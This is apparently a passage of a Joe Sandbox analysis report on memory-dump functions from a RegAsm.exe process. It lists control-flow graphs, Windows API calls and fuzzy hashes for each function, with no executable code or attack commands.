                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 5fc66518710da37dacc4d8355190e3bb9e0be94f752ce5b361c8a8adc7acbe8d
                                                                                                                                                    • Instruction ID: 2f3b0be114016839571ad960cd2c1812b13b77a993aeadab53202c1e9d8dd776
                                                                                                                                                    • Opcode Fuzzy Hash: 5fc66518710da37dacc4d8355190e3bb9e0be94f752ce5b361c8a8adc7acbe8d
                                                                                                                                                    • Instruction Fuzzy Hash: 6C714A70A00B458FD724DF29D5417AABBF1FF88304F10896DE48AD7A50D7B5E845CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 04940BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1019 4940bfc-49442fc 1022 4944302-4944307 1019->1022 1023 49443ac-49443cc call 4940ad4 1019->1023 1025 4944309-4944340 1022->1025 1026 494435a-4944392 CallWindowProcW 1022->1026 1030 49443cf-49443dc 1023->1030 1032 4944342-4944348 1025->1032 1033 4944349-4944358 1025->1033 1028 4944394-494439a 1026->1028 1029 494439b-49443aa 1026->1029 1028->1029 1029->1030 1032->1033 1033->1030
                                                                                                                                                    APIs
                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04944381
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1443456211.0000000004940000.00000040.00000800.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_4940000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2714655100-0
                                                                                                                                                    • Opcode ID: 63140263c14b473e0fcf34c712371364055a38e3875ceb2393323fe1995887aa
                                                                                                                                                    • Instruction ID: f05b2350dc35ec13730b67fb8c3f6416af4586536cae35898668f325c8f0a5da
                                                                                                                                                    • Opcode Fuzzy Hash: 63140263c14b473e0fcf34c712371364055a38e3875ceb2393323fe1995887aa
                                                                                                                                                    • Instruction Fuzzy Hash: 344126B5A003059FDB14CF99C448FAABBF5FF88714F248969E519AB320D734A845CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BB4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1036 bb4248-bb5a01 CreateActCtxA 1039 bb5a0a-bb5a64 1036->1039 1040 bb5a03-bb5a09 1036->1040 1047 bb5a73-bb5a77 1039->1047 1048 bb5a66-bb5a69 1039->1048 1040->1039 1049 bb5a79-bb5a85 1047->1049 1050 bb5a88 1047->1050 1048->1047 1049->1050 1052 bb5a89 1050->1052 1052->1052
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BB59F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: b4caddca59866598741105ce5ab3aef287cc5cc1e8e24c0dd90447f56839cdec
                                                                                                                                                    • Instruction ID: c8ac4bb779eca754cc36c3278ca84054c627e2518c166d0e3120a7c4837a0127
                                                                                                                                                    • Opcode Fuzzy Hash: b4caddca59866598741105ce5ab3aef287cc5cc1e8e24c0dd90447f56839cdec
                                                                                                                                                    • Instruction Fuzzy Hash: 2641BD71D00719CBEB24DFA9C884B9DBBF5FB48314F20816AD408BB251DBB5A946CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BB5935 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1053 bb5935-bb593a 1054 bb5944-bb5a01 CreateActCtxA 1053->1054 1056 bb5a0a-bb5a64 1054->1056 1057 bb5a03-bb5a09 1054->1057 1064 bb5a73-bb5a77 1056->1064 1065 bb5a66-bb5a69 1056->1065 1057->1056 1066 bb5a79-bb5a85 1064->1066 1067 bb5a88 1064->1067 1065->1064 1066->1067 1069 bb5a89 1067->1069 1069->1069
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BB59F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 327a25c4711aea7de2f68bc8b78574d05daf316a974ad31d7d6aa93b14c35b38
                                                                                                                                                    • Instruction ID: 47e0099278c6ba158fd3b5f417d81853f36fadafd4c3c2daa55f00ae2714b774
                                                                                                                                                    • Opcode Fuzzy Hash: 327a25c4711aea7de2f68bc8b78574d05daf316a974ad31d7d6aa93b14c35b38
                                                                                                                                                    • Instruction Fuzzy Hash: CA41DD71D00729CBEB24DFA9C884B9DBBF5BF48314F20816AD408BB251DBB56946CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BBC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1070 bbc9a0-bbd394 DuplicateHandle 1072 bbd39d-bbd3ba 1070->1072 1073 bbd396-bbd39c 1070->1073 1073->1072
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BBD2C6,?,?,?,?,?), ref: 00BBD387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 77ff6ff2ce1004a1087032992d2e02d85e0afa83b85a90e26df2278e8413aeb1
                                                                                                                                                    • Instruction ID: 8b5146e2bf03ee84d5132dc7f3e5d7b2cb2b251618d3b06cf558eefa87c23e41
                                                                                                                                                    • Opcode Fuzzy Hash: 77ff6ff2ce1004a1087032992d2e02d85e0afa83b85a90e26df2278e8413aeb1
                                                                                                                                                    • Instruction Fuzzy Hash: D421E6B5D003489FDB10CF9AD984BEEBBF4EB48324F14845AE918A3310D778A954CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BBD2F9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1076 bbd2f9-bbd394 DuplicateHandle 1077 bbd39d-bbd3ba 1076->1077 1078 bbd396-bbd39c 1076->1078 1078->1077
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BBD2C6,?,?,?,?,?), ref: 00BBD387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 89f2b778218b32d00bab0513e127cba8beff07006478c492f2e92919d3c515c2
                                                                                                                                                    • Instruction ID: f285e690b2523d021a7eddc109ee18ccec11a8ea04bd8567717f1e4cea461182
                                                                                                                                                    • Opcode Fuzzy Hash: 89f2b778218b32d00bab0513e127cba8beff07006478c492f2e92919d3c515c2
                                                                                                                                                    • Instruction Fuzzy Hash: 0C2112B5D00209DFDB10CFA9D580AEEBBF5EB48320F14841AE918A3310D778A940CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BBA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1081 bba870-bbb2e8 1083 bbb2ea-bbb2ed 1081->1083 1084 bbb2f0-bbb31f LoadLibraryExW 1081->1084 1083->1084 1085 bbb328-bbb345 1084->1085 1086 bbb321-bbb327 1084->1086 1086->1085
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00BBB101,00000800,00000000,00000000), ref: 00BBB312
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 8adbdec9c12d45c6b0e135b2f4474d61d10530610b876907c4a0a43de2b3caa6
                                                                                                                                                    • Instruction ID: 2a992c6962d17577c833bcdb76fcdca43935d0c8b5da56307cba5ff87ffce365
                                                                                                                                                    • Opcode Fuzzy Hash: 8adbdec9c12d45c6b0e135b2f4474d61d10530610b876907c4a0a43de2b3caa6
                                                                                                                                                    • Instruction Fuzzy Hash: 411114B6D003499FDB20CF9AC444AEEFBF4EB48321F10846ED919A7200C7B5A945CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BBB2A0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00BBB101,00000800,00000000,00000000), ref: 00BBB312
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 7c47139f0f61ced2ab0d8217cb2578249588e2b4822b7978da5bcb6bf13e5537
                                                                                                                                                    • Instruction ID: 964dce470d7d5ae2617c3f82f046aefa7f704d4254ba1b33b3080427182df193
                                                                                                                                                    • Opcode Fuzzy Hash: 7c47139f0f61ced2ab0d8217cb2578249588e2b4822b7978da5bcb6bf13e5537
                                                                                                                                                    • Instruction Fuzzy Hash: 661114B6D002498FDB24CF9AC544AEEFBF4EB48310F10845ED519A7200C7B4A545CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BBB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00BBB086
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 94b056a4026ba83e8a13b4872c669ebf4906d31ab6aab8f3b04981ee8cb62aef
                                                                                                                                                    • Instruction ID: 513627b9c983a3e25e5c441c8bd6542476aed0892e637304ce49aede8ef756d1
                                                                                                                                                    • Opcode Fuzzy Hash: 94b056a4026ba83e8a13b4872c669ebf4906d31ab6aab8f3b04981ee8cb62aef
                                                                                                                                                    • Instruction Fuzzy Hash: F211D4B5C007498FDB20DF9AC544ADEFBF4EB48324F14845AD469A7610C3B5A545CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA59D8 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d
                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                    • Opcode ID: fe1cb9e2e4c7948bed9242fb585b06aef95e5e1a4434bd5392a4005dc7527bcd
                                                                                                                                                    • Instruction ID: ef016cd69096b7f325618eca258235fa946128c6fcfcdfb483af7820de673a15
                                                                                                                                                    • Opcode Fuzzy Hash: fe1cb9e2e4c7948bed9242fb585b06aef95e5e1a4434bd5392a4005dc7527bcd
                                                                                                                                                    • Instruction Fuzzy Hash: 0DC14A35601602DFCB24CF28D480D6ABBF2FF89310B19CA9AD55A8B665D730FD46CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D81BA0 Relevance: 1.4, Instructions: 1439COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e892f94e5b631c79ab556cf36f2f5f8a3ca91c40c37174e6608daf54d5890bb
                                                                                                                                                    • Instruction ID: ad506031a63b99309c731ab3b97eb5bbcec77abf2afb0363aba0c8f097dc6320
                                                                                                                                                    • Opcode Fuzzy Hash: 1e892f94e5b631c79ab556cf36f2f5f8a3ca91c40c37174e6608daf54d5890bb
                                                                                                                                                    • Instruction Fuzzy Hash: 90C25D74B002189FDB15DB64C854BADBBB6FF88704F108099E60AAB3A1DB71ED45CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA3721 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    • Opcode ID: ba9a29531347b86fabbce98d6f046a243eabe2fca9855afe12436ec2b081fba9
                                                                                                                                                    • Instruction ID: 3bacb92e53973ed26a614902174016b9e2bac5b840c4e15d8cfcbeb08d65c9d7
                                                                                                                                                    • Opcode Fuzzy Hash: ba9a29531347b86fabbce98d6f046a243eabe2fca9855afe12436ec2b081fba9
                                                                                                                                                    • Instruction Fuzzy Hash: B5417776B002418FDB15CF64C484A6AFBF3FF89314B29895AE45AEB351DB34E841CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA3DE0 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    • Opcode ID: d68d4510782c8a22293a954e25100ff041b37705bb360a577d14ec2e12520142
                                                                                                                                                    • Instruction ID: 3137ba095afeca029446c273c76bc8167daf345c0bc1df1819193e363aa02065
                                                                                                                                                    • Opcode Fuzzy Hash: d68d4510782c8a22293a954e25100ff041b37705bb360a577d14ec2e12520142
                                                                                                                                                    • Instruction Fuzzy Hash: ED31E6327043504FCB16A778A45056E7BE79FC661131989ABE545CF352DE21ED0783E2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA84D7 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    • Opcode ID: a825936cdcddc6793a1b989971c064cbce211f68e7415766a044eefe44cbfca2
                                                                                                                                                    • Instruction ID: ab18f937881f1d62dcf900f2164000defb9b8dd1f0354400a59989d1f81dc2af
                                                                                                                                                    • Opcode Fuzzy Hash: a825936cdcddc6793a1b989971c064cbce211f68e7415766a044eefe44cbfca2
                                                                                                                                                    • Instruction Fuzzy Hash: B5318075B002058BDB18EBB8E4A467F76D3AFC82057148539D61ADB384EE34CE0287D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAB358 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    • Opcode ID: 5f0b185868ef2f1e11eac7363eafe20179d6c3959680f17ee62ff8ca36453c38
                                                                                                                                                    • Instruction ID: 52a22bf463cb5bb692211076421090fa4ad7696be9b7f1838a4c96d66172de77
                                                                                                                                                    • Opcode Fuzzy Hash: 5f0b185868ef2f1e11eac7363eafe20179d6c3959680f17ee62ff8ca36453c38
                                                                                                                                                    • Instruction Fuzzy Hash: 6A018F34D15208EFDB44EFB8E846A9C7FB2BF44201F648179E805AB314EF345A49CB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAB368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'q
                                                                                                                                                    • API String ID: 0-1807707664
                                                                                                                                                    • Opcode ID: 3b293a5b36718f223810f02ef6282e452d186eb612cd647a02f50c401bc56aaf
                                                                                                                                                    • Instruction ID: 1beb3086bb2619566d224ff5e64bfd526a7803e28297c7c2c1d00a246ca3fa28
                                                                                                                                                    • Opcode Fuzzy Hash: 3b293a5b36718f223810f02ef6282e452d186eb612cd647a02f50c401bc56aaf
                                                                                                                                                    • Instruction Fuzzy Hash: 62F03C74E15208EFDB04EFB8E44695CBFB2BF84201B1485A9E806AB315EF346E49CF45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D800D8 Relevance: .7, Instructions: 676COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e286ec38e107d5899c80983bcf0f0ce25bb5ae1369ee0c5a8b7616485fbffbf5
                                                                                                                                                    • Instruction ID: af8b4f77676ee20b2be23106a0f609acdf434d530dadbe4e5a4dcf2345c10664
                                                                                                                                                    • Opcode Fuzzy Hash: e286ec38e107d5899c80983bcf0f0ce25bb5ae1369ee0c5a8b7616485fbffbf5
                                                                                                                                                    • Instruction Fuzzy Hash: 0F429B30B007148FEB28AF75D45462EBAF2FBC6601B50895DD503AF3A5CB79ED058B86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D839D8 Relevance: .6, Instructions: 635COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0f2f4d581156fccec379ff1e0fb09eadb3a9f417a3ef5a7e43a97d6e50646322
                                                                                                                                                    • Instruction ID: 8890e98595220ec08b89dbf0f93d912f0b60e95a99e83585560ccc817d3c2d89
                                                                                                                                                    • Opcode Fuzzy Hash: 0f2f4d581156fccec379ff1e0fb09eadb3a9f417a3ef5a7e43a97d6e50646322
                                                                                                                                                    • Instruction Fuzzy Hash: 2E420734B002149FDB14DF69C994EAABBF6BF88704F15809AE50ADB3A1DA71ED41CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA48B8 Relevance: .6, Instructions: 597COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 975aece37dca90a709179f0e888ac8c54b8527197ce7cda91d86a5e48486f049
                                                                                                                                                    • Instruction ID: 86a6e25fc4816e324cbb07f8783fae6861bb62a1d6d35838d9a54ada3eecf95a
                                                                                                                                                    • Opcode Fuzzy Hash: 975aece37dca90a709179f0e888ac8c54b8527197ce7cda91d86a5e48486f049
                                                                                                                                                    • Instruction Fuzzy Hash: 63326E757006018FDB14DF39C888A6ABBF2FF89305B1584A9E546CB366DB70EC46CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D8060F Relevance: .5, Instructions: 452COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 941b4a7bbf696c231de21d6f067853863ab11ee798de385776a849cf1cbae6ae
                                                                                                                                                    • Instruction ID: 7464906360d8a25b3737949eedb8e9d29b8c70d459d94ead2cd6c8b4ca1b57b6
                                                                                                                                                    • Opcode Fuzzy Hash: 941b4a7bbf696c231de21d6f067853863ab11ee798de385776a849cf1cbae6ae
                                                                                                                                                    • Instruction Fuzzy Hash: 68029F347007048FEB18AB65D858B3D7AB2FF8A700F51895AD5039F3A1CB79ED058B95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D80687 Relevance: .4, Instructions: 389COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b8092f44a5ba9e721b9f526110183feb781476285579f5d524cc3e17c339bb91
                                                                                                                                                    • Instruction ID: 1af0afcf60579753bf5d51590975a7f3810de51f52c8322705cea6c01af9572d
                                                                                                                                                    • Opcode Fuzzy Hash: b8092f44a5ba9e721b9f526110183feb781476285579f5d524cc3e17c339bb91
                                                                                                                                                    • Instruction Fuzzy Hash: 59E181347007048FEB14AB65C858B397BB2FF8AB04F11855AD9029F3A1CBB9ED45CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D806FF Relevance: .4, Instructions: 354COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 937869abe39facd442952179cbe41040cd6a823b833d22808ed862dc2f8fe55b
